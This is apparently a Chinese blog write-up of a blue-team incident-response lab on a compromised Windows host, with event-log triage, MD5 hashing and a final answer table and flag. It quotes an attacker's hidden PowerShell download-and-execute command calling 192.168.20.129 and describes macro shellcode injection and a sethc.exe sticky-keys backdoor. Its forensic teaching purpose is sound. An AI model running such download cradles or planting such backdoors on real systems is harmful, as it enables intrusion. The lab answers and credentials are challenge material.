ATTCK实战系列——蓝队防御(六)应急响应复盘

📅 2026/7/4 23:55:19 👁️ 阅读次数 📝 编程学习
ATTCK实战系列——蓝队防御(六)应急响应复盘

前景需要:小王从某安全大厂被优化掉后,来到了某私立小学当起了计算机老师。某一天上课的时候,发现鼠标在自己动弹,又发现除了某台电脑,其他电脑连不上网络。感觉肯定有学生捣乱,于是开启了应急。

1.攻击者的外网IP地址

2.攻击者的内网跳板IP地址

3.攻击者使用的限速软件的md5大写

4.攻击者的后门md5大写

5.攻击者留下的flag

解题:

运行桌面上"解题工具.exe"即可

相关账户密码
Administrator

zgsf@2024

一、攻击者外网 IP 地址

拿到靶机后,第一反应肯定是先看当前主机有没有异常外联。毕竟题目里说“鼠标自己动”,很容易让人想到远控或者木马连接。

因此先使用:

netstat -ano

查看当前计算机的网络连接情况。

不过一开始并没有发现特别明显的异常外网 IP 请求。
既然当前网络连接没有直接结果,那下一步就转向登录日志,看看有没有可疑 IP 登录、爆破失败记录或者远程连接记录。

可以使用:

compmgmt.msc

进入计算机管理,然后在事件查看器中筛选相关事件 ID。

常见登录相关事件 ID 如下:

事件 ID 含义
4624 登录成功
4625 登录失败
4634 用户注销
4647 用户主动注销
4672 特权用户登录
4776 NTLM 身份验证
1149 远程桌面 RDP 登录成功

我首先排查了 4624 登录成功日志,但是没有发现明显异常。

接着查看 4625 登录失败日志,也没有发现有价值的信息。

远程登录相关日志也没有看到有用线索。
这说明攻击者大概率不是通过正常远程登录进入这台机器的。

接下来继续查看是否存在恶意启动项。一个破坏者如果想长期控制一台电脑,很可能会在启动项中安插恶意程序。但这里也没有发现明显恶意程序。

再看计划任务,也没有发现明显恶意进程或可疑任务。

到这里,常规登录、启动项、计划任务都没发现问题,就需要把注意力放回桌面文件上。

桌面上有几个比较显眼的 Word 文档。打开这些文件后,再次使用:

netstat -ano

可以发现主机主动访问了一个外网 IP。

这就比较明显了:这些文档很可能不是普通文件,而是钓鱼文档,里面存在恶意宏代码。

我尝试把文件转移到本机进一步分析,结果被火绒直接查杀,提示 Office 文档中存在宏病毒。

继续查看宏代码,可以看到它的大致逻辑是:

打开文档后自动执行宏,将一段 shellcode 注入到 rundll32.exe 进程中,然后连接外网 IP 8.219.200.130。

最后使用云沙箱分析,也能看到该文件存在宏注入行为。

因此,第一题答案为:

8.219.200.130

二、攻击者的内网跳板 IP 地址

第一题是从桌面恶意文件入手找到的,所以第二题我也优先从桌面继续排查。

在桌面文件中,除了恶意 Word 文档外,还有一个和 phpStudy 修复相关的文件。右键编辑后,可以看到其中存在一条 PowerShell 下载执行命令:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.20.129:801/a'))"

这条命令的意思是:

-nop:不加载 PowerShell 配置文件;
-w hidden:隐藏窗口执行;
downloadstring:从远程地址下载脚本内容;
IEX:将下载下来的内容直接当作 PowerShell 代码执行。

也就是说,它会访问:

http://192.168.20.129:801/a

下载并执行恶意脚本。

这里的 192.168.20.129 是内网地址,结合题目问“内网跳板 IP”,基本可以确定它就是攻击者的内网跳板机。

第二题答案为:

192.168.20.129

三、攻击者使用的限速软件 MD5 大写

第三题问的是攻击者使用的限速软件 MD5。

题目背景里有一个很关键的现象:

除了某台电脑,其他电脑都连不上网络。

这个现象非常像局域网限速、ARP 欺骗或者断网工具造成的。所以这里要找的不是恶意宏,也不是 PowerShell,而是类似:

P2P 终结者;
NetCut;
聚生网管;
NetLimiter;
ARP 类控制工具。

首先排查桌面和下载目录,看是否存在未知压缩包、安装程序或者文件夹,但这里没有找到明显结果。

随后继续在 C 盘中查找,在 C:\PerfLogs 下发现了一个套娃目录。一路点进去之后,最终发现了一个可疑程序:

p2pover4.34.exe

p2pover 很明显就是 P2POver,也就是常说的 P2P 终结者,属于典型的局域网限速、断网工具,正好对应题目中“其他电脑无法联网”的现象。

接下来使用 certutil 计算该文件的 MD5:

certutil -hashfile p2pover4.34.exe MD5

得到 MD5 后,注意题目要求是大写,所以第三题答案为:

2A5D8838BDB4D404EC632318C94ADC96

四、攻击者的后门 MD5 大写

第四题问的是攻击者留下的后门。

这里和第三题的思路不一样。第三题是找“限速工具”,第四题要找的是“权限维持后门”。

一开始我也沿着启动项、计划任务、PowerShell 日志这些方向排查,但是没有发现特别明显的结果。既然常规持久化位置没有明显线索,就要考虑 Windows 中比较经典的后门方式,比如:

粘滞键后门;
辅助功能后门;
IFEO 映像劫持;
系统文件替换。

这里重点关注:

C:\Windows\System32\sethc.exe

sethc.exe 是 Windows 的粘滞键程序。正常情况下,连续按 5 次 Shift 会触发粘滞键提示。但攻击者经常会把它替换成 cmd.exe 或自己的后门程序。这样在登录界面连续按 5 次 Shift,就可能直接弹出命令行或者后门程序。

在 System32 目录下查看时,发现 sethc.exe 明显异常:

它的修改时间和大小都不太正常,结合题目问“后门”,基本可以判断这个文件就是被攻击者替换过的粘滞键后门。

接下来还是使用 certutil 计算该文件的 MD5:

certutil -hashfile "C:\Windows\System32\sethc.exe" MD5

得到结果后转换为大写,第四题答案为:

58A3FF82A1AFF927809C529EB1385DA1
五、攻击者留下的 flag

最后一题比较直接。

既然第四题已经确定后门文件是 sethc.exe,那么 flag 很可能就在这个后门程序中。

可以直接打开这个文件查看,也可以连续按 5 次 Shift 触发粘滞键后门。

最终得到 flag:

flag{zgsf@shift666}

六、最终答案汇总
题号 问题 答案
1 攻击者的外网 IP 地址 8.219.200.130
2 攻击者的内网跳板 IP 地址 192.168.20.129
3 限速软件 MD5 大写 2A5D8838BDB4D404EC632318C94ADC96
4 后门 MD5 大写 58A3FF82A1AFF927809C529EB1385DA1
5 攻击者留下的 flag flag{zgsf@shift666}

七、总结

这道题的整体攻击链大概是:

恶意 Office 文档

宏代码执行 shellcode

连接外网 IP 8.219.200.130

PowerShell 下载执行内网脚本

内网跳板 IP 192.168.20.129

使用 P2POver 进行局域网限速/断网

替换 sethc.exe 留下粘滞键后门

通过后门文件拿到 flag

整体来说,这道题还是比较综合的。它不是单纯查一个日志就能出结果,而是需要从网络连接、登录日志、启动项、计划任务、桌面文件、恶意宏、限速工具、系统后门几个方向一起排查。

不过说实话,做到最后还是有点绷不住。题目背景说是“小学计算机老师”,结果学生会钓鱼文档、宏注入、PowerShell 下载执行、P2P 限速,还知道粘滞键后门。
这真的是小学吗?怎么不是同龄人也酱味大鸡我!!